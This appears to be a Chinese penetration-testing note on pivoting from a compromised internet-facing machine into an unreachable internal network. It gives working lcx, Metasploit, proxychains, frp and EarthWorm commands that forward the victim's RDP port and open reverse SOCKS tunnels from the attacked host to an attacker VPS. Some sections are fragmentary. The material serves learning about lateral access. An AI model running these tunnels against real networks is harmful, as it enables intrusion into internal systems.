针对于进入外网服务器后无法访问不通外网的内网服务器资源的技巧 并不是直接横向移动
环境:
win7(PC1)通外网 IP:192.168.93.20
win7(PC2)不通外网通PC1 IP:192.168.93.40
该方法需要下载lck文件,建议去网上寻找
https://www.zhuguodong.com/xiazai/%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84/LCX%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E6%98%A0%E5%B0%84.rar
使用方法
lcx.exe –listen 4444 5555 #将lck传上去后 公网vps上执行该命令 意思是4444端口启动监听并转发到5555端口上
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389 #内网主机执行将本地3389端口发送到公网4444
操作方面相较于其他比较简单
这个我研究很久 最后才发现 他所代理出来的IP为cs启动的服务器IP 端口也在服务器上
例如你的cs服务器是192.168.1.100 被攻击机为192.168.1.101 启动代理之后你连接需要连接192.168.1.100+端口就可以代理到被攻击机
创建sock代理后,需要开启防火墙放行该端口
第一种: msf代理上线内网(也可以理解为软件自带代理上线,这种渗透测试工具一般都可以设置代理)
启动msf输入
setg Proxies socks4:192.168.175.200:9527
setg ReverseAllowProxy true
随后可以启动模块对目标进行扫描攻击等
攻击成功会在当前msf窗口反弹shell
第二种:proxychains代理将各种工具传入内网(常用)
只讲linux的 没有这个软件可以网上搜教程 kali自带
vim /etc/proxychains.conf
socks4 192.168.179.128 9527
设置代理后 proxychains 加你想要执行的服务
例如 proxychains firebox 启动浏览器之后可以访问内网web站点
open在我的使用理解下就是主要是访问内网资源,和内网交互
这种方法搭建很难很麻烦,基本可能是要目标开启rdp,因为我暂时没有找到windows命令行安装的方法
但是效果应该是最好的,可以使得当前客户机和内网直接交互
教程可以去网上自行寻找
项目地址 https://github.com/fatedier/frp/releases
介绍以下frp的文件
frps和frps.ini 都是服务端设置的 可以理解为放入被攻击机的文件
frpc和frpc.ini 都是客户端设置的 可以理解为放入攻击机的文件
我的配置文件如下 并且测试了成功上线
frpc.ini
[common]
server_addr = vps地址
server_port = 7000
authentication_method = token
token = admin@passwd2022 #vps所设置的密码
[web]
type = http
local_port = 80
custom_domains = vps地址
frps.ini
[common]
bind_port = 7000
token=admin@passwd2022
vhost_http_port = 80
服务端运行 ./frps -c frps.ini
客户端运行 ./frpc -c frpc.ini
启动之后可以通过vps的80端口访问到客户端的80端口
项目地址:https://github.com/idlefire/ew 内网大杀器 在复杂的网络环境下完成网络穿透
该项目地址讲的非常清楚 不过在这我还是举个例子方便理解
第一种 当目标有公网IP时 我们直接上传ew对应的版本 在上面执行
./ew -s ssocksd -l 8888
这样该服务器上就会启动一个 8888 端口的sock5代理
然后就是启动proxychains挂上代理访问内网 记得防火墙打开端口
第二种 当目标没有公网IP时 这是我们就需要一个我们自己的公网IP了
./ew -s rcsocks -l 1080 -e 8888 #这是在我们的公网vps上执行的 他的意思是将vps本地的1080端口的请求转发到8888端口
./ew -s rssocks -d 1.1.1.1 -e 8888 #这个时候我们在使用被攻击机将代理流量走入这台vps的8888端口就可以形成代理了 此处的1.1.1.1是我们的公网IP
随后还是一样的操作 proxychains 代理
这一条感觉很像cs的sock代理 可能区别就是一个sock4一个是sock5
这一条我在win10和win11测试发现不兼容不能生成 貌似已经没有更新了
win7可以生成 但是我没有找到合适的教程没有测试成功 感兴趣的可以去网上找一下测试一下
效果应该和open差不都 都是直接和内网交互的 但是比open简单
这些测试根据自己的实际情况来使用就行了